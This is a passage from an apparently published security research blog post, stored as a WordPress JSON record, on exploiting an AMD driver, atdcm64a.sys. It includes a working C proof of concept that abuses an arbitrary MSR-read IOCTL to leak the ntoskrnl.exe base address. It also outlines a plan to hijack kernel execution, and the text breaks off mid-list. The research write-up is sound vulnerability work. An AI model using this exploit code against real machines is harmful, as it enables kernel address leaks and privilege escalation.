{"id":4091,"date":"2024-10-02T09:55:21","date_gmt":"2024-10-02T07:55:21","guid":{"rendered":"https:\/\/security.humanativaspa.it\/?p=4091"},"modified":"2025-09-15T13:21:15","modified_gmt":"2025-09-15T13:21:15","slug":"exploiting-amd-atdcm64a-sys-arbitrary-pointer-dereference-part-2","status":"publish","type":"post","link":"https:\/\/hnsecurity.it\/it\/blog\/exploiting-amd-atdcm64a-sys-arbitrary-pointer-dereference-part-2\/","title":{"rendered":"Exploiting AMD atdcm64a.sys arbitrary pointer dereference – Part 2"},"content":{"rendered":"

Welcome back! We concluded the previous article<\/a> by spotting two vulnerabilities in atdcm64a.sys<\/em>: an arbitrary MSR read<\/strong> and an arbitrary pointer dereference<\/strong>. In this second part of the series<\/a> we will focus on confirming that we can actually exploit these vulnerabilities.<\/p>\n

We will start with the arbitrary MSR read<\/strong>, by creating a PoC that exploits the vulnerability by reading a Model Specific Register (MSR)<\/strong> of our choice and finally retrieves the base address of ntoskrnl.exe<\/strong>.<\/p>\n

Then we will focus on the arbitrary pointer dereference<\/strong>. In this case the objective of the PoC will be to redirect the execution flow to an arbitrary location<\/strong> leading the VM to crash by causing a BSOD<\/em>. We will have to define multiple data structures in order to successfully hijack the execution flow and debug the driver. We will see how to debug the driver using IDA Pro with the assistance of the decompiled code<\/strong>.<\/p>\n

\n
\n

Confirming the vulnerabilities<\/h2>\n
\n

At this point the objective is confirming that we are actually able to exploit the vulnerabilities by creating a simple C\/C++ program that interacts with the driver and sends the appropriate IOCTLs.<\/p>\n<\/div>\n

Confirming the arbitrary MSR read<\/h3>\n
\n

Let’s start confirming the arbitrary MSR read vulnerability as it seems much easier to exploit. Here’s a snippet of code that allows us to confirm the vulnerability:<\/p>\n<\/div>\n<\/div>\n<\/div>\n

\n
[...]\r\n\r\nDWORD64 g_ntbase = 0;\r\nDWORD64 g_kisystemcall64shadow = 0;\r\n[...]\r\n#define SIZE_BUF 4096\r\n#define IOCTL_READMSR 0x22e09c\r\n#define IOCTL_ARBITRARYCALLDRIVER    0x22e04c\r\n#define IA32_GS_BASE 0xc0000101\r\n#define IA32_LSTAR\t0xc0000082\r\n#define IA32_STAR\t0xc0000081\r\n\r\nHANDLE g_device;\r\n\r\n\r\nBOOL readMSR(DWORD msr_value,PVOID outputBuffer, SIZE_T outSize) {\r\n    char* inputBuffer = (char*)VirtualAlloc(\r\n        NULL,\r\n        SIZE_BUF,\r\n        MEM_COMMIT | MEM_RESERVE,\r\n        PAGE_EXECUTE_READWRITE);\r\n\r\n    *((DWORD*)inputBuffer) = msr_value;\r\n\r\n    if (inputBuffer == NULL)\r\n        return -2;\r\n\r\n    printf(\"[+] User buffer allocated: 0x%8p\\n\", inputBuffer);\r\n    \r\n\r\n    DWORD bytesRet = 0;\r\n\r\n    \r\n    BOOL res = DeviceIoControl(\r\n        g_device,\r\n        IOCTL_READMSR,\r\n        inputBuffer,\r\n        SIZE_BUF,\r\n        outputBuffer,\r\n        outSize,\r\n        &bytesRet,\r\n        NULL\r\n    );\r\n\r\n    printf(\"[*] sent IOCTL_READMSR \\n\");\r\n    if (!res) {\r\n        printf(\"[-] DeviceIoControl failed with error: %d\\n\", GetLastError());\r\n    }\r\n    return res;\r\n}\r\n\r\n\r\nint main()\r\n{\r\n    DWORD bytesRet = 0;\r\n\r\n    g_device = CreateFileA(\r\n        \"\\\\\\\\.\\\\AtiDCM\",\r\n        GENERIC_READ | GENERIC_WRITE,\r\n        0,\r\n        NULL,\r\n        OPEN_EXISTING,\r\n        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,\r\n        NULL);\r\n\r\n\r\n\r\n    if (g_device == INVALID_HANDLE_VALUE)\r\n    {\r\n        printf(\"[-] Failed to open handle to device.\");\r\n        return -1;\r\n    }\r\n\r\n    printf(\"[+] Opened handle to device: 0x%8p\\n\", g_device);\r\n\r\n    char* outputBuffer = (char*)VirtualAlloc(\r\n        NULL,\r\n        SIZE_BUF,\r\n        MEM_COMMIT | MEM_RESERVE,\r\n        PAGE_EXECUTE_READWRITE);\r\n\r\n\r\n    memset(outputBuffer, 0x0, SIZE_BUF);\r\n\r\n\r\n    if (readMSR(IA32_LSTAR, outputBuffer, SIZE_BUF)) {\r\n        printf(\"[+] readMSR success.\\n\");\r\n        printf(\"[+] IA32_LSTAR = 0x%8p\\n\", *((DWORD64*)(outputBuffer + 12)));\r\n        \/\/printf(\"[+] IA32_LSTAR = 0x%8p\\n\", *((DWORD64*)(outputBuffer + 4)));\r\n        g_kisystemcall64shadow = *((DWORD64*)(outputBuffer + 12));\r\n        g_ntbase = (DWORD64)g_kisystemcall64shadow - 0xaf61c0;\r\n        printf(\"[+] g_ntbase = 0x%p\\n\", g_ntbase);\r\n    }\r\n\r\n    return 0;\r\n}<\/pre>\n
\n
\n
The PoC simply does the following:<\/p>\n
    \n
  1. Open the handle to device using the name \\\\.\\AtiDCM<\/code>.<\/li>\n
  2. Issue a call to DeviceIoControl()<\/em><\/strong> passing as input: the handle<\/em> obtained previously, the IOCTL 0x22e09c<\/strong>, that allows to reach the vulnerability, the inputBuffer<\/em>, that contains the value of the MSR that we want to read<\/strong> (in this case is 0xc0000082 that corresponds to the IA32_LSTAR MSR<\/strong>) and the outputBuffer<\/em>.<\/li>\n
  3. Read the value of the IA32_LSTAR<\/strong> register from the outputBuffer (it contains the address of nt!KiSystemCall64Shadow<\/code>) and then subtract offset 0xaf61c0<\/strong> in order to retrieve the base address of ntoskrnl.exe<\/strong>.<\/li>\n<\/ol>\n<\/div>\n
    After compiling and running our PoC we get the following output.<\/div>\n
    <\/div>\n
    \n
    \"\"
    Leaking the base of ntoskrnl.exe running the PoC<\/figcaption><\/figure>\n<\/div>\n
    We can confirm in Windbg that the base address of ntoskrnl.exe calculated in the PoC is valid.<\/div>\n
    <\/div>\n
    \n
    \"\"
    Printing the base address of ntoskrnl.exe in windbg<\/figcaption><\/figure>\n<\/div>\n<\/div>\n<\/div>\n
    \n
    Confirming the arbitrary pointer dereference<\/h3>\n
    \n
    In order to confirm the second vulnerability we need to:<\/p>\n